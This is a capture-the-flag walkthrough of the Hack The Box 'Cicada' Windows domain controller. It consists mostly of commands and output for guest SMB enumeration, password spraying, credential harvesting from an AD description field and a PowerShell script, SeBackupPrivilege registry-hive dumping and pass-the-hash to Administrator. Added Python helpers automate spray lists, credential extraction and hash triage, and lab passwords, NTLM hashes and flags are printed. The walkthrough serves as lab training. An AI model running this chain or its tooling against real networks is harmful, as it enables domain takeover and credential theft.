Proof of Concept
10.129.231.149
Nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman

Information Gathering
Collecting host information
┌──(kali㉿kali)-[~/Cicada]
└─$ nxc smb 10.129.231.149 --generate-hosts-file hosts
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
┌──(kali㉿kali)-[~/Cicada]
└─$ cat hosts
10.129.231.149 CICADA-DC.cicada.htb cicada.htb CICADA-DC

Configuring the /etc/hosts file
┌──(kali㉿kali)-[~/Cicada]
└─$ cat /etc/hosts
<SNIP>
10.129.231.149 CICADA-DC.cicada.htb cicada.htb CICADA-DC

Auth as michael.wrightson
A null session is refused when enumerating SMB shares (STATUS_USER_SESSION_DELETED), but the guest account can authenticate, and it has read access to the HR share.
┌──(kali㉿kali)-[~/Cicada]
└─$ nxc smb 10.129.231.149 --shares
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.149 445 CICADA-DC [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
┌──(kali㉿kali)-[~/Cicada]
└─$ nxc smb 10.129.231.149 -u 'guest' -p '' --shares
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.129.231.149 445 CICADA-DC [*] Enumerated shares
SMB 10.129.231.149 445 CICADA-DC Share Permissions Remark
SMB 10.129.231.149 445 CICADA-DC ----- ----------- ------
SMB 10.129.231.149 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.231.149 445 CICADA-DC C$ Default share
SMB 10.129.231.149 445 CICADA-DC DEV
SMB 10.129.231.149 445 CICADA-DC HR READ
SMB 10.129.231.149 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.231.149 445 CICADA-DC NETLOGON Logon server share
SMB 10.129.231.149 445 CICADA-DC SYSVOL Logon server share

Accessing the HR share over SMB and downloading the "Notice from HR.txt" file
┌──(kali㉿kali)-[~/Cicada]
└─$ smbclient //10.129.231.149/HR -U guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 08:29:09 2024
.. D 0 Thu Mar 14 08:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 13:31:48 2024
4168447 blocks of size 4096. 482126 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (1.3 KiloBytes/sec) (average 1.3 KiloBytes/sec)

The file discloses the default password handed to new hires
- Cicada$M6Corpb*@Lp#nZp!8
┌──(kali㉿kali)-[~/Cicada]
└─$ cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp

Extracting the user list (RID brute force over the guest session)
┌──(kali㉿kali)-[~/Cicada]
└─$ impacket-lookupsid cicada.htb/guest@10.129.231.149 -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at 10.129.231.149
[*] StringBinding ncacn_np:10.129.231.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
513: CICADA\Domain Users (SidTypeGroup)
514: CICADA\Domain Guests (SidTypeGroup)
515: CICADA\Domain Computers (SidTypeGroup)
516: CICADA\Domain Controllers (SidTypeGroup)
517: CICADA\Cert Publishers (SidTypeAlias)
518: CICADA\Schema Admins (SidTypeGroup)
519: CICADA\Enterprise Admins (SidTypeGroup)
520: CICADA\Group Policy Creator Owners (SidTypeGroup)
521: CICADA\Read-only Domain Controllers (SidTypeGroup)
522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
525: CICADA\Protected Users (SidTypeGroup)
526: CICADA\Key Admins (SidTypeGroup)
527: CICADA\Enterprise Key Admins (SidTypeGroup)
553: CICADA\RAS and IAS Servers (SidTypeAlias)
571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)

Password spraying the default password against the user list succeeds for michael.wrightson. The [+] lines tagged (Guest) are not valid credentials: the DC mapped those non-existent usernames to the guest account.
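The users.txt fed to the spray below is the user list from the lookupsid output above, and the spray output has to be read with care because the DC maps unknown names to Guest. As an added example that is not part of the original writeup, the Python below builds the list from lookupsid output and separates real hits from guest fallbacks in NetExec's results. The two embedded outputs are constructed excerpts in those tools' formats, and the output file name users.txt is an assumption.

```python
"""Added example, not part of the original writeup: build the spray list from
impacket-lookupsid output and separate real hits from guest fallbacks in
NetExec's spray output. The two sample outputs are constructed excerpts in
the tools' formats."""
import re

# Constructed excerpt of `impacket-lookupsid` output.
LOOKUPSID_OUTPUT = """\
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
500: CICADA\\Administrator (SidTypeUser)
501: CICADA\\Guest (SidTypeUser)
502: CICADA\\krbtgt (SidTypeUser)
513: CICADA\\Domain Users (SidTypeGroup)
1000: CICADA\\CICADA-DC$ (SidTypeUser)
1104: CICADA\\john.smoulder (SidTypeUser)
1106: CICADA\\michael.wrightson (SidTypeUser)
1109: CICADA\\Dev Support (SidTypeGroup)
1601: CICADA\\emily.oscars (SidTypeUser)
"""

# Constructed excerpt of `nxc smb ... --continue-on-success` output.
NXC_SPRAY_OUTPUT = """\
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\\Dev:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\\:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
"""

SID_LINE = re.compile(r"^(\d+): [^\\]+\\(.+?) \(SidType(\w+)\)$")
RESULT_LINE = re.compile(r"\[([+-])\] [^\\]+\\([^:]*):(\S*)(?: (.*))?$")


def spray_targets(lookupsid_output, skip_builtin=True):
    """Names worth spraying: SidTypeUser entries only, no machine accounts
    (trailing $), and by default no well-known RIDs below 1000 (Administrator,
    Guest, krbtgt), which are usually handled separately."""
    users = []
    for line in lookupsid_output.splitlines():
        m = SID_LINE.match(line.strip())
        if not m:
            continue
        rid, name, kind = int(m.group(1)), m.group(2), m.group(3)
        if kind != "User" or name.endswith("$"):
            continue
        if skip_builtin and rid < 1000:
            continue
        users.append(name)
    return users


def real_logins(nxc_output):
    """(user, password) pairs that really authenticated. NetExec also prints
    [+] when the server silently mapped an unknown user to Guest; it tags those
    with '(Guest)' and they prove nothing about the password."""
    found = []
    for line in nxc_output.splitlines():
        m = RESULT_LINE.search(line)
        if not m or m.group(1) != "+":
            continue
        user, password, tail = m.group(2), m.group(3), m.group(4) or ""
        if not user or "(Guest)" in tail:
            continue
        found.append((user, password))
    return found


if __name__ == "__main__":
    with open("users.txt", "w") as fh:  # the list passed to nxc -u users.txt
        fh.write("\n".join(spray_targets(LOOKUPSID_OUTPUT)) + "\n")
    for user, password in real_logins(NXC_SPRAY_OUTPUT):
        print(f"valid: {user}:{password}")
```

Run it with the real lookupsid output piped into LOOKUPSID_OUTPUT and the real spray log into NXC_SPRAY_OUTPUT; the point of real_logins is that a "[+]" line alone is not proof of a valid password on a DC that allows guest fallback.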
┌──(kali㉿kali)-[~/Cicada]
└─$ nxc smb 10.129.231.149 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success -t 100
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
<SNIP>
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\Dev:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\:Cicada$M6Corpb*@Lp#nZp!8 (Guest)

Auth as emily.oscars
Enumerating Active Directory users as michael.wrightson reveals david.orelious's password in the account's description field
- aRt$Lp#7t*VQ!3
┌──(kali㉿kali)-[~/Cicada]
└─$ nxc smb 10.129.231.149 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.231.149 445 CICADA-DC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.231.149 445 CICADA-DC Administrator 2024-08-26 20:08:03 1 Built-in account for administering the computer/domain
SMB 10.129.231.149 445 CICADA-DC Guest 2024-08-28 17:26:56 0 Built-in account for guest access to the computer/domain
SMB 10.129.231.149 445 CICADA-DC krbtgt 2024-03-14 11:14:10 1 Key Distribution Center Service Account
SMB 10.129.231.149 445 CICADA-DC john.smoulder 2024-03-14 12:17:29 0
SMB 10.129.231.149 445 CICADA-DC sarah.dantelia 2024-03-14 12:17:29 1
SMB 10.129.231.149 445 CICADA-DC michael.wrightson 2024-03-14 12:17:29 0
SMB 10.129.231.149 445 CICADA-DC david.orelious 2024-03-14 12:17:29 1 Just in case I forget my password is aRt$Lp#7t*VQ!3
SMB 10.129.231.149 445 CICADA-DC emily.oscars 2024-08-22 21:20:17 1
SMB 10.129.231.149 445 CICADA-DC [*] Enumerated 8 local users: CICADA

The david.orelious account has read access to the DEV share
┌──(kali㉿kali)-[~/Cicada]
└─$ nxc smb 10.129.231.149 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.129.231.149 445 CICADA-DC [*] Enumerated shares
SMB 10.129.231.149 445 CICADA-DC Share Permissions Remark
SMB 10.129.231.149 445 CICADA-DC ----- ----------- ------
SMB 10.129.231.149 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.231.149 445 CICADA-DC C$ Default share
SMB 10.129.231.149 445 CICADA-DC DEV READ
SMB 10.129.231.149 445 CICADA-DC HR READ
SMB 10.129.231.149 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.231.149 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.231.149 445 CICADA-DC SYSVOL READ Logon server share

Accessing the DEV share and downloading Backup_script.ps1
┌──(kali㉿kali)-[~/Cicada]
└─$ smbclient //10.129.231.149/DEV/ -U 'david.orelious'
Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 08:31:39 2024
.. D 0 Thu Mar 14 08:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 13:28:22 2024
4168447 blocks of size 4096. 478070 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)

Backup_script.ps1 contains the password of the emily.oscars account as a plaintext literal passed to ConvertTo-SecureString -AsPlainText
- emily.oscars:Q!3@Lp#M6b*7t*Vt
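Both passwords in this section were found the same way: a secret typed where it does not belong, once in an AD description field and once as a string literal in a script. As an added example that is not taken from the writeup, the Python below automates that search over nxc --users output and over PowerShell files; both inputs are constructed excerpts in the style of the outputs on this page. One practical caveat: copy the password from the raw file, since rendered pages easily drop the * characters in it.

```python
"""Added example, not part of the original writeup: find plaintext credentials
in the two places this walkthrough found them, AD user description fields
(as printed by nxc --users) and PowerShell scripts that turn a string literal
into a PSCredential. Both inputs below are constructed excerpts."""
import re

# Constructed excerpt of `nxc smb ... --users` output
# (columns: Username, Last PW Set, BadPW, Description).
NXC_USERS_OUTPUT = """\
SMB 10.129.231.149 445 CICADA-DC Administrator 2024-08-26 20:08:03 1 Built-in account for administering the computer/domain
SMB 10.129.231.149 445 CICADA-DC john.smoulder 2024-03-14 12:17:29 0
SMB 10.129.231.149 445 CICADA-DC david.orelious 2024-03-14 12:17:29 1 Just in case I forget my password is aRt$Lp#7t*VQ!3
"""

# Constructed PowerShell snippet in the style of Backup_script.ps1.
PS_SCRIPT = r'''
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
'''

USER_ROW = re.compile(
    r"^\S+ \S+ \d+ \S+ (?P<user>\S+) \d{4}-\d\d-\d\d \d\d:\d\d:\d\d \d+(?: (?P<desc>.*))?$"
)
# "password is X", "pwd: X", "pass=X": the usual ways a secret ends up in a description.
DESC_HINT = re.compile(
    r"\b(?:password|passwd|pass|pwd|pw|creds?)\b[^:=]*?(?:is|=|:)\s*(\S+)", re.I
)
# A user-ish variable assignment, and a literal handed to ConvertTo-SecureString -AsPlainText.
PS_USER = re.compile(r'\$\w*user\w*\s*=\s*"([^"]+)"', re.I)
PS_PASS = re.compile(r'ConvertTo-SecureString\s+"([^"]+)".*-AsPlainText', re.I)


def description_secrets(nxc_users_output):
    """(user, candidate) for every description that names a password."""
    hits = []
    for line in nxc_users_output.splitlines():
        m = USER_ROW.match(line)
        if not m or not m.group("desc"):
            continue
        h = DESC_HINT.search(m.group("desc"))
        if h:
            hits.append((m.group("user"), h.group(1)))
    return hits


def script_secrets(script):
    """(username, password) for each hard-coded credential in a PowerShell
    script; the username is the most recent $...user... assignment seen."""
    user, found = None, []
    for line in script.splitlines():
        u = PS_USER.search(line)
        if u:
            user = u.group(1)
        p = PS_PASS.search(line)
        if p:
            found.append((user, p.group(1)))
    return found


if __name__ == "__main__":
    for user, pw in description_secrets(NXC_USERS_OUTPUT):
        print(f"description: {user}:{pw}")
    for user, pw in script_secrets(PS_SCRIPT):
        print(f"script: {user}:{pw}")
```

Description hits are candidates, not confirmed credentials; verify them with a single nxc login per hit rather than spraying them.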
┌──(kali㉿kali)-[~/Cicada]
└─$ cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

SMB and WinRM authentication succeed as emily.oscars
┌──(kali㉿kali)-[~/Cicada]
└─$ nxc smb 10.129.231.149 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt
┌──(kali㉿kali)-[~/Cicada]
└─$ nxc winrm 10.129.231.149 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
WINRM 10.129.231.149 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM 10.129.231.149 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)

WinRM access as emily.oscars
┌──(kali㉿kali)-[~/Cicada]
└─$ evil-winrm -i 10.129.231.149 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>

Read user.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> dir
Directory: C:\Users\emily.oscars.CICADA\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/1/2026 12:21 PM 34 user.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt
0371906e4768225a71b7049ed4ab8889
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::1a0
IPv6 Address. . . . . . . . . . . : dead:beef::7d0e:e696:1e19:5af8
Link-local IPv6 Address . . . . . : fe80::cf20:a348:cd1c:ce13%6
IPv4 Address. . . . . . . . . . . : 10.129.231.149
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%6
10.129.0.1

Privilege Escalation
Checking the privileges of emily.oscars
- SeBackupPrivilege and SeRestorePrivilege are enabled
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Using the SeBackupPrivilege held by emily.oscars to dump the Administrator NTLM hash. NetExec's backup_operator module starts RemoteRegistry over a named pipe, saves the SAM, SYSTEM and SECURITY hives to a share, pulls them back and runs a secretsdump-style extraction on them.
- 2b87e7c93a3e8a0ea4a581937016f341
┌──(kali㉿kali)-[~/Cicada]
└─$ nxc smb 10.129.231.149 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -M backup_operator
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt
BACKUP_O... 10.129.231.149 445 CICADA-DC [*] Triggering RemoteRegistry to start through named pipe...
BACKUP_O... 10.129.231.149 445 CICADA-DC Saved HKLM\SAM to \\10.129.231.149\SYSVOL\SAM
BACKUP_O... 10.129.231.149 445 CICADA-DC Saved HKLM\SYSTEM to \\10.129.231.149\SYSVOL\SYSTEM
BACKUP_O... 10.129.231.149 445 CICADA-DC Saved HKLM\SECURITY to \\10.129.231.149\SYSVOL\SECURITY
SMB 10.129.231.149 445 CICADA-DC [*] Copying "SAM" to "/home/kali/.nxc/logs/CICADA-DC_10.129.231.149_2026-02-01_164413.SAM"
SMB 10.129.231.149 445 CICADA-DC [+] File "SAM" was downloaded to "/home/kali/.nxc/logs/CICADA-DC_10.129.231.149_2026-02-01_164413.SAM"
SMB 10.129.231.149 445 CICADA-DC [*] Copying "SECURITY" to "/home/kali/.nxc/logs/CICADA-DC_10.129.231.149_2026-02-01_164413.SECURITY"
SMB 10.129.231.149 445 CICADA-DC [+] File "SECURITY" was downloaded to "/home/kali/.nxc/logs/CICADA-DC_10.129.231.149_2026-02-01_164413.SECURITY"
SMB 10.129.231.149 445 CICADA-DC [*] Copying "SYSTEM" to "/home/kali/.nxc/logs/CICADA-DC_10.129.231.149_2026-02-01_164413.SYSTEM"
SMB 10.129.231.149 445 CICADA-DC [+] File "SYSTEM" was downloaded to "/home/kali/.nxc/logs/CICADA-DC_10.129.231.149_2026-02-01_164413.SYSTEM"
BACKUP_O... 10.129.231.149 445 CICADA-DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
BACKUP_O... 10.129.231.149 445 CICADA-DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BACKUP_O... 10.129.231.149 445 CICADA-DC DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BACKUP_O... 10.129.231.149 445 CICADA-DC $MACHINE.ACC:plain_password_hex:6209748a5ab74c44bd98fc5015b6646467841a634c4a1b2d6733289c33f76fc6427f7ccd8f6d978a79eec3ae49eb8c0b5b14e193ec484ea1152e8a04e01a3403b3111c0373d126a566660a7dd083aec1921d53a82bc5129408627ae5be5e945ed58cfb77a2a50e9ffe7e6a4531febd965181e528815d264885921118fb7a74eff51306dbffa4d6a0c995be5c35063576fc4a3eba39d0168d4601da0a0c12748ae870ff36d7fb044649032f550f04c017f6d94675b3517d06450561c71ddf8734100898bf2c19359c69d1070977f070e3b8180210a92488534726005588c0f269a7e182c3c04b96f7b5bc4af488e128f8
BACKUP_O... 10.129.231.149 445 CICADA-DC $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:188c2f3cb7592e18d1eae37991dee696
BACKUP_O... 10.129.231.149 445 CICADA-DC dpapi_machinekey:0x0e3d4a419282c47327eb03989632b3bef8998f71
dpapi_userkey:0x4bb80d985193ae360a4d97f3ca06350b02549fbb
BACKUP_O... 10.129.231.149 445 CICADA-DC NL$KM:cc1501f764391e7a5e538cc174e62b01369b50b8d07223d9b6c56e922f5708d81eba8e8123250327364c19b496cd251f8ff97f5d71e66e8cffcbeb5e4ea4e696
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\Administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!)
BACKUP_O... 10.129.231.149 445 CICADA-DC [*] Dumping NTDS...
SMB 10.129.231.149 445 CICADA-DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.129.231.149 445 CICADA-DC [-] Could not connect: timed out
BACKUP_O... 10.129.231.149 445 CICADA-DC [*] Cleaning dump with user Administrator and hash 2b87e7c93a3e8a0ea4a581937016f341 on domain cicada.htb
BACKUP_O... 10.129.231.149 445 CICADA-DC [*] Successfully deleted dump files !

The NTDS dump itself timed out, but the Administrator hash recovered from the SAM hive (on a domain controller the local SAM holds the DSRM administrator) is accepted for cicada.htb\Administrator, as the (Pwn3d!) line shows.

WinRM access with the obtained Administrator NTLM hash (pass-the-hash)
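Before using the hash, it is worth triaging what the privilege-escalation step above produced: which enabled privileges are actually worth something, and which dumped hashes are usable (the NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 is the empty password, so Guest and DefaultAccount are dead ends). The Python below does that over constructed excerpts of the whoami /priv and module output shown above. It is an added example, not part of the writeup; the CICADA-DC$ line is constructed in NTDS format, since the real NTDS dump timed out, and the list of high-value privileges is the editor's, not the tool's.

```python
"""Added example, not part of the original writeup: triage the two outputs
of the privilege-escalation step, `whoami /priv` and the secretsdump-style
hash lines the backup_operator module prints. Both samples are constructed
excerpts; the CICADA-DC$ line is in the NTDS format the module would have
printed had that dump not timed out."""
import re

# Constructed excerpt of `whoami /priv`.
WHOAMI_PRIV = """\
Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
"""

# Constructed excerpt of the module's hash output (user:rid:lm:nt:::).
DUMP_OUTPUT = """\
BACKUP_O... 10.129.231.149 445 CICADA-DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
BACKUP_O... 10.129.231.149 445 CICADA-DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BACKUP_O... 10.129.231.149 445 CICADA-DC DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BACKUP_O... 10.129.231.149 445 CICADA-DC CICADA-DC$:1000:aad3b435b51404eeaad3b435b51404ee:188c2f3cb7592e18d1eae37991dee696:::
"""

# Privileges that, once enabled, give a well-documented path to SYSTEM or to
# credential material; the value says what the holder can do with it.
HIGH_VALUE = {
    "SeBackupPrivilege": "read any file: save the SAM/SYSTEM hives or copy NTDS.dit",
    "SeRestorePrivilege": "write any file or registry key, e.g. replace a service binary",
    "SeImpersonatePrivilege": "impersonate tokens (potato-style escalation)",
    "SeDebugPrivilege": "open any process, including LSASS",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load a kernel driver",
}

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string
NO_LM = "aad3b435b51404eeaad3b435b51404ee"     # LM placeholder when LM storage is off
HASH_LINE = re.compile(
    r"(?P<user>[^\s:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::"
)


def enabled_high_value(whoami_output):
    """{privilege: what it buys} for enabled privileges from HIGH_VALUE.
    Disabled ones are left out; a token that holds them can enable them,
    but that is a separate step."""
    found = {}
    for line in whoami_output.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0] in HIGH_VALUE and parts[-1] == "Enabled":
            found[parts[0]] = HIGH_VALUE[parts[0]]
    return found


def parse_hashes(dump_output):
    """Parse user:rid:lm:nt::: lines into dicts, flagging accounts whose NT
    hash is the empty password and accounts that still store an LM hash."""
    rows = []
    for line in dump_output.splitlines():
        m = HASH_LINE.search(line)
        if m:
            rows.append({
                "user": m["user"], "rid": int(m["rid"]), "nt": m["nt"],
                "empty_password": m["nt"] == EMPTY_NT,
                "lm_stored": m["lm"] != NO_LM,
            })
    return rows


def pth_candidates(rows):
    """(user, nt) pairs worth trying with -H: accounts with a non-empty NT
    hash. Machine accounts are skipped; their hashes are not what you feed
    to evil-winrm."""
    return [(r["user"], r["nt"]) for r in rows
            if not r["empty_password"] and not r["user"].endswith("$")]


if __name__ == "__main__":
    for priv, why in enabled_high_value(WHOAMI_PRIV).items():
        print(f"{priv}: {why}")
    for user, nt in pth_candidates(parse_hashes(DUMP_OUTPUT)):
        print(f"evil-winrm -i 10.129.231.149 -u '{user}' -H '{nt}'")
```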
┌──(kali㉿kali)-[~/Cicada]
└─$ evil-winrm -i 10.129.231.149 -u 'administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Read root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
7dba6469ae1365c9b378a36985aa0412
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::1a0
IPv6 Address. . . . . . . . . . . : dead:beef::7d0e:e696:1e19:5af8
Link-local IPv6 Address . . . . . : fe80::cf20:a348:cd1c:ce13%6
IPv4 Address. . . . . . . . . . . : 10.129.231.149
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%6
